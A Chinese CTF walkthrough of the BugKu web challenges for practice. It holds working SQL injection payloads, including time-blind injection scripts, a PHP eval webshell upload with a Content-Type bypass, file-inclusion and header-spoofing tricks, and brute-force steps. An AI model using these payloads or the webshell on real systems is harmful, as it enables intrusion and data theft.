BugKu Web篇通关wp

文章目录

  • BugKu Web篇通关wp
    • 0x01 WEB2
    • 0x02 计算器
    • 0x03 web基础$_GET
    • 0x04 web基础$_POST
    • 0x04 矛盾
    • 0x05 WEB3
    • 0x06 域名解析
    • 0x07 你必须让他停下
    • 0x08 本地包含
    • 0x09 变量1
    • 0x10 WEB5
    • 0x11 头等舱
    • 0x12 网站被黑
    • 0x13 管理员系统
    • 0x14 web4
    • 0x15 flag在index里
    • 0x16 输入密码查看flag
    • 0x17 备份是个好习惯
    • 0x18 成绩单
    • 0x19秋名山老司机
    • 0x20 速度要快
    • 0x21 Cookie欺骗
    • 0x22 never give up
    • 0x23 字符?正则?
    • 0x24 你从哪里来
    • 0x25 md5 collision(NUPT_CTF)
    • 0X26 程序员本地网站
    • 0x27 各种绕过
    • 0x28 txt????
    • 0x29 细心
    • 0x30 getshell
    • 0x31 INSERT INTO 注入
    • 0x32 多次 【没写完】
    • 0x33 PHP_encrypt_1
    • 0x34 flag.php
    • 0x40 sql注入2
    • 0x41 孙XX的博客
    • 0x42 Trim

0x01 WEB2

没啥好说的直接F12打开控制台,找到Flag 过!
在这里插入图片描述

0x02 计算器

在这里插入图片描述
需要计算64+65的结果,F12打开控制台,发现
在这里插入图片描述
修改为10,就可以输入了,得到flag过!

在这里插入图片描述

0x03 web基础$_GET

简单的get传参,直接通过url传参即可
在这里插入图片描述

0x04 web基础$_POST

类似get的操作,这里使用hackbar实现

在这里插入图片描述

在这里插入图片描述

0x04 矛盾

这里考察PHP中的一个知识点。函数is_numeric() 判断变量是否为数字意思是 num既不是纯数字,又要等于1 所以就构造一个 num=1wahh(开头为1,字母随意) 提交上去

在这里插入图片描述

0x05 WEB3

一进去就是是无需循环的弹窗
在这里插入图片描述
直接检查源码
在源码的最下面有一串union编码,到相关的网站里面即可解码
KEY{J2sa42ahJK-HS11III}

0x06 域名解析

在这里插入图片描述
我们先进入到123.206.87.240中发现:
在这里插入图片描述
400 其含义是你访问的页面域名不存在或者请求错误。主要分为两种。
1、语义有误,当前请求无法被服务器理解。除非进行修改,否则客户端不应该重复提交这个请求。
2、请求参数有误。
400的主要有两种形式:
1、bad request意思是“错误的请求";
2、invalid hostname意思是"不存在的域名”。

题目已经提示我们要进行域名解析,那么就需要修改http请求中的host

在这里插入图片描述
通过插件,伪装host
在这里插入图片描述
得到Flag

0x07 你必须让他停下

打开的时候发现发现一直在不停的发送请求更新页面,大概几次就会出现一个图案,这里只需要使用bs进行截断然后慢慢分析即可

在这里插入图片描述
找到图片正常显示的那个地方,F12打开控制台,即可发现flag

0x08 本地包含

这个题目现在好像已经崩了,但是题目还是挺经典的
在这里插入图片描述
发现源码里面出现了eval()而且没有做任何的过滤,出现了include和request就是典型的文件包含漏洞了。

我们可以直接构造 hello=show_source(%27flag.php%27);//

在这里插入图片描述
直接获取flag

0x09 变量1

上来给了一段代码,相对代码进行解析

flag In the variable ! <?php  error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){ // 获取get参数args$args = $_GET['args'];if(!preg_match("/^\w+$/",$args)){ // 正则匹配获取args中的字母或数字die("args error!");}eval("var_dump($$args);"); 
}
?>

这里说一下php的var_dumps()函数
显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。

这里设计到php中的全局数组变量,$GLOBALS 是由所以定义的全局变量组成的数组,变量名就是该数组的索引,在所有脚本中都有效,在函数或对象中的方法中不需要使用关键字global访问,在函数外部声明全局变量,可以使用$_GLOBALS 数组替代global 关键字

构造这样的urlhttp://123.206.87.240:8004/index1.php?args=GLOBALS flag get !
在这里插入图片描述

0x10 WEB5

F12 打开,发现了一堆JSFUCK编码,直接负责到控制台来翻译一下

在这里插入图片描述
这里需要从源码里复制,要不太多了控制台里面显示不全

在这里插入图片描述
提交之后居然还给我显示这个
在这里插入图片描述

题目提示了,字母要大写。那就用大写的提交呗

在这里插入图片描述
flag get

0x11 头等舱

点击发现这个画面
在这里插入图片描述

查看源码也是什么都没有,那就抓一下包吧

在这里插入图片描述
flag get !

0x12 网站被黑

题目提示实战经常遇到,而且是php的网页,没办法用御剑扫一下吧
在这里插入图片描述

扫到一个嘿嘿,进去看一看

在这里插入图片描述

尝试了一些弱密码都不行,尝试使用burp suite进行暴力破解。

在这里插入图片描述
在这里插入图片描述
成功了!

在这里插入图片描述

flag get !

0x13 管理员系统

尝试输入会发现IP被禁止,F12检查以下源码发现了这个东西
在这里插入图片描述
base64解码之后是test123

尝试
在这里插入图片描述
发现还是不行,就考虑到应该是对方设置了访问IP现在,那么我们就需要伪造IP了,这里就设计到XFF协议,简单的说就是修改请求头中的这个
在这里插入图片描述
在这里插入图片描述
flag get !

0x14 web4

在这里插入图片描述
检查源代码我们发现是一堆url编码

解码之后拼起来就变成了

function checkSubmit(){var a=document.getElementById(“password”);if(“undefined”!=typeof a){if(“67d709b2b54aa2aa648cf6e87a7114f1”==a.value)return!0;alert(“Error”);a.focus();return!1}}document.getElementById(“levelQuest”).οnsubmit=checkSubmit;

0x15 flag在index里

题目直接提示flag在index里,然后在看看url,有一个file= 猜测可能是一个php的文件包含漏洞。尝试下面的url

http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
以base64的方式解析出index.php的内容,然后在进行base64解码即可

在这里插入图片描述

0x16 输入密码查看flag

在这里插入图片描述

看到这个5位的密码,在检查源码和抓包之后都没有发现什么端倪,尝试bp一波

这里想尝试一下5位数字,5位字母需要的时间太长了
在这里插入图片描述
在这里插入图片描述
爆破成功啦!
在这里插入图片描述

0x17 备份是个好习惯

打开之后是一串编码

d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e

尝试了一下不是普通的编码格式,题目提示备份是一个好习惯,但是观察url有没有直接引用文件。所以尝试访问index.php,发现页面显示访问正常,备份文件的后缀为bak,尝试访问index.php.bak 文件被下载下来了。

<?php
/*** Created by PhpStorm.* User: Norse* Date: 2017/8/6* Time: 20:22
*/include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');  // 获取?之后的字符串(包括?)
$str = substr($str,1); // 获取从第二位之后的字符串
$str = str_replace('key','',$str); // 将 key替换为 空
parse_str($str); // 解析传入的变量
echo md5($key1); // md5加密echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){echo $flag."取得flag";
}
?>

代码的解析已经写在注释里了,主要有用到两个思想

  • 混写绕过, kkeyey1在被上述的代码处理后救变成了key1
  • php中的数组在md5加密后结果是一样的

所以可以构造这样的代码

http://123.206.87.240:8002/web16/index.php?kkeyey1[]=ahhhh&kkeyey2[]=ahh

0x18 成绩单

这题很经典!!! 你可以在这题里面掌握基础的sql手工注入的技巧

这里有个成绩查询的功能
在这里插入图片描述
输入数字可以查询人的成绩

为了方便我们使用HackBar的插件来发送post请求
我们发现发送id=1’没有回显,输入id=1’#有回显,接下来通过order by来确定数据库的列数

id=1' order by 1#  // 有回显
id=1' order by 2#  // 有回显
id=1' order by 3#  // 有回显
id=1' order by 4#  // 有回显
id=1' order by 5#  // 无回显

可以确定数据库有4列,接下来使用select 1,2,3,4来进行入住

在这里插入图片描述
id=0' union select 1,database(),user(),version()#
在这里插入图片描述
成功查询到数据库名称,接下来查询表名。

这里有一个固定的查询方式id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),user(),version()#

在这里插入图片描述

查询到有fl4g和sc两个表

直接查询fl4g就好啦
在这里插入图片描述
flag get!!!

0x19秋名山老司机

这道题的知识点有如下几点:

  • 正则表达式 / Xpath 匹配
  • session保持会话
  • post发送消息

主要的思路就是迅速的计算出结果然后发送post消息,废话不多说直接上python脚本代码

import requests
from lxml import etreeurl = 'http://123.206.87.240:8002/qiumingshan/'
s = requests.session()
re = s.get(url=url).text
tree = etree.HTML(re)
cal = tree.xpath('/html/body/div[1]/text()')
result = eval(cal[0][:-3])
post = {'value': result
}
flag = s.post(url=url, data=post).text
print(flag)

在这里插入图片描述
flag get !!!

0x20 速度要快

打开网页看到一行字, 我觉得你要快点

打开Burp Suite,放到Reapeater里Go之后发现
在这里插入图片描述
里面有一个flalg,很明显的base64编码进行解码,我们可以得到:跑的还不错,给你flag吧: OTQ3NTc5,一提交发现是错的。。。

它提示,需要将这个margin通过post消息发送,接下来开始python编码。

import requests
import base64se = requests.session()
url = 'http://123.206.87.240:8002/web6/'
result = se.get(url)
base = result.headers['flag'][-12:]
flag = base64.b64decode(base64.b64decode(base))
data = {'margin': flag}
flag = se.post(url=url, data=data).text
print(flag)

发送之后可得到flag
在这里插入图片描述

0x21 Cookie欺骗

打开网页后一堆东西,啥都得不到,观察一下url发现url里面好像包含了一个base64编码。进行解码得到keys.txt
我们类似的可以尝试一下index.php的base64的编码。访问之后什么都看不到,尝试修改一下line的数值发现可以得到index.php里的内容,整理一下我们可以得到

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

我们将filename的值改为index.php的base64编码:a2V5cy5waHA=。然后将Cookie的设为margin=margin
可以用如下的python代码获取flag

import requestsurl = 'http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy5waHA='
cookie = {'margin': 'margin'}headers = {'Cookie': 'margin=margin'}
result = requests.get(url=url,headers=headers).text
print(result)

0x22 never give up

先检查源码:
在这里插入图片描述
尝试访问一下,发现会跳转到bugku的首页
看一下1p.html的源码
view-source:http://123.206.87.240:8006/test/1p.html
在这里插入图片描述
发现一些url编码,然后进行解压,可以得到一串base64编码,再进行解码,又得到一串url编码,再进行解码,我去无限套娃是不是?然后终于得到了代码:

if(!$_GET['id'])
{header('Location: hello.php?id=1');exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{echo 'no no no no no no no';return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{require("f4l2a3g.txt");
}
else
{print "never never never give up !!!";
}
?>

代码中可以看到flag应该是存储在f4l2a3g.txt,尝试在url里访问一下,falg get
在这里插入图片描述

0x23 字符?正则?

通过对题目的阅读我们可以发现,主要是思路是绕过正则,那么接下来我们来分析一下这个正则。

/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i

  • .* 匹配任意多个字符
  • . 匹配任意单个字符
  • {4,7} 最少匹配 4 次且最多匹配 7 次,结合前面的 . 也就是匹配 4 到 7
  • / 转义 “/”
  • [a-z] 匹配任意一个小写字母
  • [:punct:] 匹配任意标点符号
  • /i 表示不区分大小写

所以我们可以构造出来一个这样的正则

keylalalakey6666key:/6/keyz:

结合代码我们可以知道,只需要通过get请求的方式传入即可

http://123.206.87.240:8002/web10/?id=keylalalakey6666key:/6/keyz:

在这里插入图片描述

key 出来了!

0x24 你从哪里来

在这里插入图片描述

很明显了,就是想让我们伪装一下请求头就ok了,没什么难度直接过, 修改请求头中的Referer字段即可

在这里插入图片描述

在这里插入图片描述

0x25 md5 collision(NUPT_CTF)

本题的主要思路是:根据==用法,0 == 字符串是成立的,从而可以绕过MD5检查。

所以只需要构造一个0开头的md5码即可,我们可以构造一个这样的md5码,s878926199a ,传入即可获取flag

在这里插入图片描述

0X26 程序员本地网站

一打开几面就提示请从本地访问,尝试一下把Client-ip求改为127.0.0.1。成功获取flag
在这里插入图片描述

0x27 各种绕过

上来就给了一大串代码,让我们来分析分析

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']); // get传参获取id
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) { // get传参获取uname,post传参获取passwd【不为NULL】if ($_GET['uname'] == $_POST['passwd']) // uname和passwd的值不能为NULLprint 'passwd can not be uname.';else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin')) // 比较sha1加密后结果die('Flag: '.$flag);elseprint 'sorry!';
}
?>

这里其实用的是ctf里面一个经常出现的绕过方式了,原理就是php中数组在sha1加密后数值相同。构造一下就可

在这里插入图片描述
在这里插入图片描述

flag轻松获取了

0x28 txt???

先来分析一下代码

<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

大体就是读入一个文件,然后让他的内容和ac的值相等,因为我是有云服务器且部署好了static文件夹,就自己手动输入一个txt在云服务器上然后控制他们的值相等就可以了
大致的url是这样的

http://123.206.87.240:8002/web8/?ac=wahh&fn=http://xxx.xxx.xxx.xxx/text.txt

0x29 细心

在这里插入图片描述

拿到题目之后是这样的,啥信息也没有,就尝试去各种常用路径里面看看,之后发现了robot.txt里面有东西
在这里插入图片描述
我们到resusl.php里去看一看
在这里插入图片描述
提示了这个信息,这里的我的IP打了马赛克,然后下面提示了我们可以传入x作为密码。那就先尝试尝试一些弱密码吧
试了下admin居然直接就可以了。。。。
在这里插入图片描述

0x30 getshell

在这里插入图片描述

很明显的文件上传漏洞,我们来试一试吧,上传一句话木马<?php eval(@$_POST['a']); ?>试一试

在这里插入图片描述
提示不能上传,那就先把后缀改为jpg,试试看然后使用bp中途把改回php,尝试之后发现还是不行。

那就尝试尝试php5这样的可不可以绕过吧。发现还是不行,又仔细看了看包的内容发现还有一个Content-Type把他大小写绕过一下看看。结果成功上传!

POST /web9/index.php HTTP/1.1
Host: 123.206.87.240:8002
Content-Length: 310
Cache-Control: max-age=0
Origin: http://123.206.87.240:8002
Upgrade-Insecure-Requests: 1
Content-Type: MulTipart/form-data; boundary=----WebKitFormBoundarylB9qExaaIBaDtX4o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://123.206.87.240:8002/web9/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: xadsccerfbuawerf=CN
Connection: close------WebKitFormBoundarylB9qExaaIBaDtX4o
Content-Disposition: form-data; name="file"; filename="shell.php5"
Content-Type: image/jpeg<?php eval(@$_POST['a']); ?>
------WebKitFormBoundarylB9qExaaIBaDtX4o
Content-Disposition: form-data; name="submit"Submit
------WebKitFormBoundarylB9qExaaIBaDtX4o--

在这里插入图片描述

0x31 INSERT INTO 注入

题目给出了php代码,我们先分析一下

error_reporting(0);function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];}$host="localhost";
$user="";
$pass="";
$db="";$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");mysql_select_db($db) or die("Unable to select database");$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

可以看到,这里的代码信息是获取我们的IP并插入到数据库中。

可以看到,这是X-Forwarded-For的注入,而且过滤了逗号,。在过滤了逗号的情况下,我们就不能使用if语句了,不用担心,我们有下面的代码进行替换。

select case when (条件) then 代码1 else 代码 2 end;

让我们构造一下payload,爆出数据库和列名的过程我就掠过了,原理基本相同

127.0.0.1'+(select case when substr((select flag from flag) from 1 for 1)='a' then sleep(5) else 0 end))-- +

这里手工注入太累了,我们写一个脚本来帮助一下。因为现在bugku的免费访问版速度实在是太慢了,所以我们把sleep的时间改成10,然后下面的timeout也设置成8,这样就没有什么问题了。

import requests
from tqdm import tqdm
url = "http://123.206.87.240:8002/web15/"
flag = ""
for i in tqdm(range(1, 33)):for str1 in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*.":data = "11' and (case when (substr((select group_concat(flag) from flag) from " + str(i) + " for 1 )='" + str1 + "') then sleep(10) else 1 end )) #"# print dataheaders = {"x-forwarded-for": data}try:result = requests.get(url, headers=headers, timeout=8)except requests.exceptions.ReadTimeout as e:flag += str1print(flag)break
print('flag:' + flag)

0x32 多次 【没写完】

这题为sql注入,先让我们进行一下分析

  1. 加 ’ 报错
  2. ’ --++ 正常
  3. ‘ and 1=1 --++报错

应该是进行了过滤吧,可以尝试双写绕过,比如and 写成aandnd,便可成功绕过

下面给出爆出个信息的payload

数据库

?id=1%27%20anandd%201=2%20ununionion%20seselectlect%201,database()%23

在这里插入图片描述

数据表

id=-1%27%20ununionion%20seselectlect%201,%20group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=database()--++
在这里插入图片描述

很明显flag1里面应该是我们要的。

列名

?id=-1' ununionion seselectlect 1, group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() anandd table_name='flag1' %23

在这里插入图片描述
然后我们选择flag1这一列

?id=-1' ununionion seselectlect 1, group_concat(flag1) from flag1 %23
在这里插入图片描述
flag get ! 才怪!! 还真是多次,梅开二度了还。

既然flag1里没有我们想要的东西,那么就去address里面看看,构造如下的payload

?id=-1%27%20ununionion%20seselectlect%201,%20group_concat(address)%20from%20flag1%20%23
在这里插入图片描述
看来是没那么简单啊。我们再进去看看

在这里插入图片描述
继续呗

  • ’ 报错
  • ’–++ 正常显示
  • ’ and 1=1 报错
  • ’ anand 1=1 报错
  • 1’ and updatexml(1,concat(0x7e,(database()),0x7e),1)#

看来是换waf的模式,经过几番尝试发现可以运用updatexml()漏洞思想入侵。

  • 查表:?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),3) %23
    在这里插入图片描述

  • 查字段名:?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag2'),'~'),3) %23
    在这里插入图片描述

  • 查字段:?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),3) %23

在这里插入图片描述

0x33 PHP_encrypt_1

上来给了一个代码

<?php
function encrypt($data,$key)
{$key = md5('ISCC');$x = 0;$len = strlen($data);$klen = strlen($key);for ($i=0; $i < $len; $i++) { if ($x == $klen){$x = 0;}$char .= $key[$x];$x+=1;}for ($i=0; $i < $len; $i++) {$str .= chr((ord($data[$i]) + ord($char[$i])) % 128);}return base64_encode($str);
}
?>
output: fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=

靠的应该是php的反序列化,根据序列化代码写出反序列化代码如下

<?php
function decrypt($str) {$mkey = "729623334f0aa2784a1599fd374c120d";$klen = strlen($mkey);$tmp = $str;$tmp = base64_decode($tmp);  //  decode the string $md_len = strlen($tmp); // get the length of the stringfor ($i=0; $i < $md_len; $i++) {  if ($x == $klen)  $x = 0;$char .= $mkey[$x];  /$x+=1;}$md_data = array();for($i=0;$i<$md_len;$i++) { array_push($md_data, ord($tmp[$i]));}$md_data_source = array();$data1 = "";$data2 = "";foreach ($md_data as $key => $value) { $i = $key;if($i >= strlen($mkey)) {$i = $i - strlen($mkey);}$dd = $value;$od = ord($mkey[$i]);array_push($md_data_source,$dd);$data1 .= chr(($dd+128)-$od);  $data2 .= chr($dd-$od); }print "data1 => ".$data1."<br>\n";print "data2 => ".$data2."<br>\n";
}
$str = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=";
decrypt($str);
?>

最后得到flag为{asdqwfasfdwfefqdqwdadwqdaw*}

0x34 flag.php

一进去发现一个不能按的登陆按钮,其他的信息就什么都没有了,想起题目提示了hint,就像试试看访问一些hint相关的内容,之后发现访问http://123.206.87.240:8002/flagphp/?hint=2可以访问。之后得到了代码,再看看代码吧

<?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer']; // 获取Cookie
if(isset($_GET['hint'])){show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY") // 对cookie的值进行反序列化
{   echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center"><form method="POST" action="#"><p><input name="user" type="text" placeholder="Username"></p><p><input name="password" type="password" placeholder="Password"></p><p><input value="Login" type="button"/></p></form>
</div>
</body>
</html><?php
}
$KEY='ISecer:www.isecer.com';
?>

通过解析代码我们可以知道,需要在Cookie中包含一个字段ISecer,这个字段的值反序列化之后需要为KEY的值,这里需要注意代码是从上往下运行的所以现在的KEY是空

<?php
echo serialize('');
?>
output:s:0:"";

将s:0:""; 传入,发现还是不对。发现把;进行url编码后才可以。这里还需要注意因为代码里面写的是else if所有不能在同时传参hint,否则没用!
在这里插入图片描述

0x40 sql注入2

题目提示,几乎把所有的关键字都过滤了。所以我们首先需要确认到底哪些关键字被过滤。尝试进行输入发现,如果输入被过滤的关键字会有提示。我们打开Burp Suite抓一下包,然后用关键字密码字典爆破一下,看哪些关键字没有被过滤。
首先我们构造这样的payload来判断过滤了哪些关键字
在这里插入图片描述
加载一下常用的关键字,这个字典随便百度一下就有了,还是比较全的
在这里插入图片描述
长度位367的是没有过滤的,370的是已经过滤了的
在这里插入图片描述
根据结果可以发现,能用的只有一些异或运算符了。这题主要应该是运用异或注入。

通过尝试admin等常规若口令我们可以得到,是有admin这个用户的。

这里补充几个知识点:

  • sql语句是可以处理减法的
  • 字符串被视为0

如果这题构造这样的payloadadmin' -(sql语句)-'a
由于此题把空格给毙掉了。所以常规的语句写法都不能用 ,而且union,and,or这样的都被屏蔽了。emmm这里是真的难搞,最后决定大胆的尝试字段名passwd,还真被猜中了,写个代码求解一下答案吧

import requests
from tqdm import tqdm
url = "http://123.206.87.240:8007/web2/login.php"letters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'password = ""
for i in tqdm(range(1, 50)):for j in letters:payload = "admin'-(ascii(substring((passwd)from(" + str(i) + ")))=" + str(ord(j)) + ')' + "-'a"data = {'uname': payload,'passwd': '233'}r = requests.post(url=url, data=data)if "username error!!@_@" in str(r.content):password += jprint(password)

最后得到一个32位的字符串,应该是一串md5吗,解码之后结果就是admin123,尝试用这个登陆一下。

在这里插入图片描述
ls一下就出来结果了。。。
在这里插入图片描述

0x41 孙XX的博客

在这里插入图片描述
题目提示,需要用到渗透测试第一步信息收集

0x42 Trim

几番尝试之后没有什么结果,就使用御剑进行了扫描了一下
在这里插入图片描述
尝试了 show.php ,发现flag里面直接就有了。。。
在这里插入图片描述

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. Netty的网络编程模型

    网络编程模型传统的BIO网络编程模型(线程池)Netty的网络编程模型按照场景去理解NettyJDK原生的NIO编程Netty在原生NIO编程的改进 传统的BIO网络编程模型(线程池) 传统的网络编程模型,以Tomcat为代表,服务端的ServerSocketChannel个数取决于线程池中线程的数量,如图所示。…...

    2024/4/13 1:06:02
  2. [Java]学习笔记18:使用对象类型作为方法的参数和返回值

    对象类型作为方法的参数 当一个对象作为参数,传递到方法当中时,实际上传递进去的是对象的地址值。Demo03PhoneParam.java package cn.edu.qilu.day1.demo07;public class Demo03PhoneParam {public static void main(String[] args) {Phone one = new Phone();one.brand = &q…...

    2024/4/13 8:50:17
  3. C#网络编程(1)

    ◆IP协议:网际协议(Internet Protocol) ◆TCP协议: 传输控制协议(Transmission Control Protocol) ◆UDP协议:用户数据协议(User Datagram Protocol) ◆IPX/SPX协议:互联网包交换协议-IPX,顺序分组交换协议-SPX ◆ATM协议:异步传输模式协议Microsoft. Net Framework为应用程序…...

    2024/4/13 0:18:01
  4. 5G 与 MEC 边缘计算

    转自(JmilkFan_范桂飓)目录文章目录目录前言参考文献通信网络核心网演进之路早古时期2G 网络架构3G 网络架构4G 网络架构5G5G 网络的需求5G 网络架构的设计原则5G 网络的逻辑架构5G 核心网络的关键技术SBA 基于服务的架构微服务化基于服务的接口CUPS 控制与用户面分离网络切片…...

    2024/4/22 16:09:09
  5. 详解一条查询select语句和更新update语句的执行流程

    前言一条select语句的执行流程建立连接查询缓存解析器和预处理器词法解析和语法解析(Parser)预处理器(Preprocessor)查询优化器(Query Optimizer)优化器可以做哪些优化优化器并不是万能的优化器如何得到查询计划存储引擎查询返回结果一条update语句的执行流程Buffer Poolredo l…...

    2024/4/13 14:40:04
  6. HTTPS,HTTP追加协议 - 重学计算机网络系列(4)

    前言本篇文章主要讲HTTPS,HTTP和HTTPS区别,认证,SPDY的AJAX与Comet,WebsocketHTTPS HTTP的缺点 通信使用明文可能会被窃听 由于HTTP本身不具备加密的功能,所以也无法做到对通信整体(使用HTTP协议通信的请求和响应的内容)进行加密。即,HTTP报文使用明文(指未经过加密的…...

    2024/4/28 13:59:34
  7. 常见的Web攻击及防御办法 - 重学计算机网络系列(5)

    Web攻击分类 简单的HTTP协议本身并不存在安全性问题,因此协议本身几乎不会成为攻击的对象。应用HTTP协议的服务器和客户端,以及运行在服务器上的Web应用等资源才是攻击目标。 web应用的攻击模式有以下两种主动攻击(主要攻击服务器上的资源)SQL注入攻击 OS命令注入攻击 其他被…...

    2024/4/13 15:10:54
  8. 浏览器系列(上)- 前端发展历史,渲染进程

    前端发展历史 早期时代(1990-)Web 1.0 时代,非常适合创业型小项目,不分前后端,经常 3-5 人搞定所有开发。页面由 JSP、PHP 等工程师在服务端生成,浏览器负责展现。基本上是服务端给什么浏览器就展现什么,展现的控制在 Web Server 层。 这种模式的好处是简单明快,适合小…...

    2024/4/25 7:33:14
  9. 浏览器系列(中) - 浏览器缓存,WebStorage

    缓存定义缓存是一种保存资源副本并在下次请求时直接使用该副本的技术。从一次完整的HTTP请求看缓存分类客户端缓存存在于客户端本地,如果客户端命中缓存,甚至不需要发起HTTP请求,相当于直接在本地拿数据。一般在这里的缓存技术有Cookie,localstorage,sessionstorage,本地文件…...

    2024/4/23 7:20:32
  10. 离散(时间)线性系统、离散化、Z域、差分方程

    离散(时间)控制系统: 一个控制系统中,有一处或者几处的喜好形式是脉冲序列信号或者编码序列信号(统称为离散信号),这个系统就称为离散(时间)控制系统。 分类: 采样控制系统 数字控制系统: 系统中具有数字式控制器或者计算机的控制系统。例如,四旋翼控制系统中,飞控…...

    2024/4/13 15:13:07
  11. 2020年最新人事管理软件排名(建议收藏)!

    今年受疫情影响,很多企业第一第二季度基本算是没了,剩下第三第四季度,可想而知企业的压力有多么的大,稍有松懈就会面临淘汰或者倒闭的风险。很多企业这段时间也都面临人才管理的压力,企业压力大,员工的压力也大,如何合理平衡企业与员工之间的关系至关重要。什么是人事管…...

    2024/4/22 14:59:13
  12. 使用frp无域名http内网穿透配置

    简单说就是直接使用tcp穿透,使用本方法的前提是必须要有一台有公网ip的电脑 配置如下:client端[common] server_addr = 外网服务器ip server_port = 7000 [web] type = tcp local_ip = 127.0.0.1 local_port = 80 remote_port = 80server端[common] bind_addr = 0.0.0.0 bind…...

    2024/4/27 15:03:47
  13. CG CTF-Web-综合题2

    前言 这道题主要涉及了文件包含、代码审计、SQL注入、回调后门等内容。 这道题是CG CTF里面出的比较好的一个题目了,对于我这样的萌新来说,虽然不能独立做出来,但是看了WP之后真的学到了很多东西,也知道了自己欠缺的在哪里。 WP 打开环境,看到是Xlcteam客户留言板。我们先…...

    2024/4/13 17:37:48
  14. 注解版的springaop实操讲解(赋完整测试代码)

    aop是个很强的东西,我们可以用来实现日志收集,鉴权,敏感词过滤等等功能。在说注解版的springaop使用之前,一些专业术语我用大白话来复述一遍,希望大家不要嫌弃。切面:切入点+通知 连接点:目标对象中被增强的某个方法 切点:连接点的集合 目标对象:被增强的对象 织入:把…...

    2024/4/17 23:25:29
  15. 映像租赁系统

    映像租赁系统:在美国,由于知识产权得到了很好的保护,所以一般不会出现盗版的问题。美国人除去在电影院看电影之外就是在影像店租碟回家去看。在这种情况下,影相出租的店铺就比较多。在信息化的背景下,设计一套系统管理影像出租业务成了当务之急,于是通过和店铺经理沟通,…...

    2024/4/22 0:30:45
  16. JVM内存结构 - Java内存模型 - Java对象模型

    Java的内存结构Java作为一种面向对象的,跨平台语言,其对象、内存等一直是比较难的知识点。而且很多概念的名称看起来又那么相似,很多人会傻傻分不清楚。比如本文我们要讨论的JVM内存结构、Java内存模型和Java对象模型,这就是三个截然不同的概念,但是很多人容易弄混。可以这…...

    2024/4/17 15:53:29
  17. IBatis异常: Cannot find class: VARCHAR || Error starting ApplicationContext. To display the conditio

    我的问题再于主要就是 类型 jdbcType 写成了javaType,然后就没有然后了, 上异常,给大家参考 "D:\Program Files\Java\jdk1.8.0_131\bin\java.exe" -XX:TieredStopAtLevel=1 -noverify -Dspring.output.ansi.enabled=always -Dcom.sun.management.jmxremote -Dsp…...

    2024/4/13 21:04:59
  18. 前端初步入门spring-------06-代理

    一、什么是代理 代理,是OOP里面,很重要的一个设计模式,成为代理模式 就是生成一个和真实角色 相同的 代理角色 真实角色负责自己业务有关的事情 代理角色负责一些边角的事情,来为真实业务辅助比如 医生 和 护士 医生算是一个真实角色,护士算是 医生的代理,也就是代理角色…...

    2024/4/28 8:59:56
  19. 字符串解析省市区

